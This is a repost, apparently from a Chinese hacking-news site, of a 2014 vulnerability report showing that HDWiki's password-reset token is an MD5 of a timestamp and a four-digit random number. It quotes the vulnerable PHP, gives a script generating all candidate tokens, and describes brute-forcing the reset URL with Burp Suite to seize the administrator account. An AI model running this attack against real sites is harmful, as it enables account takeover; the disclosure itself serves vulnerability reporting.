记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Hdwiki 设计缺陷 知邮箱可改密码(包括管理员)

2014-07-06 04:15

在control/user.php中



function dogetpass(){

if(isset($this->get[2])){

$uid = is_numeric($this->get[2]) ? $this->get[2] : 0;

$encryptstring=$this->get[3];

$idstring=$_ENV['user']->get_idstring_by_uid($uid,$this->time);

if(!empty($encryptstring) && !empty($idstring) && ($idstring==$encryptstring)){



省略一点。

}else{

$timetemp=date("Y-m-d H:i:s",$this->time);

$verification= rand(1000,9999);



$encryptstring=md5($this->time.$verification);



$reseturl=WIKI_URL."/index.php?user-getpass-".$user['uid'].'-'.$encryptstring;

$_ENV['user']->update_getpass($user['uid'],$encryptstring);

$mail_subject = $this->setting['site_name'].$this->view->lang['getPass'];

$mail_message = $this->view->lang['resetPassMs1'].$user['username'].$this->view->lang['resetPassMs2'].$timetemp.$this->view->lang['resetPassMs3']."<a href='".$reseturl."' target='_blank'>".$reseturl."</a>".$this->view->lang['resetPassMs4'].$this->setting['site_name'].$this->view->lang['resetPassMs5'].$this->setting['site_name'].$this->view->lang['resetPassMs6'];

$this->load('mail');

$_ENV['mail']->add(array(), array($email), $mail_subject, $mail_message, '', 1, 0);

$this->message($this->view->lang['emailSucess'],'index.php?user-login',0);





看这里 需要改密码的话就是验证encryptstring 而encryptstring的验证很弱。。



$encryptstring=md5($this->time.$verification);



这里 就是对时间戳 和 一个随机的1000-10000 进行md5一次。



这里我们可以来直接进行爆破。





由于 管理员 和 用户都是在一个表里面的。



所以 也可以改管理的密码。

漏洞证明:

在点击找回密码的时候 记住一下时间戳



h3.jpg





然后 写个脚本。 因为我之前测试的时候时间戳不是这样的 我用的之前测试的时候的时间戳截图。



<?php



for ($a=1000;$a<10001;$a++){

$b=md5("1396789952$a");

echo "\r\n";

echo $b;}

?>





然后导出来, 然后载入burpsuite进行爆破。



index.php?user-getpass-".$user['uid'].'-'.$encryptstring



路径是为这样的 一般我们就是用来修改管理员的密码、 而管理的uid都是1 这个就不用管了。



h4.jpg





观察length 即可知道 正确不。



可以看到我这个爆破到3768的时候 成功。

然后直接访问。



h5.jpg





即可直接修改管理的密码。



修复方案:

加强验证。



求高分。



求不要给2rank可好?

知识来源: www.wooyun.org/bugs/wooyun-2014-055786

阅读:79811 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“Hdwiki 设计缺陷 知邮箱可改密码(包括管理员)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云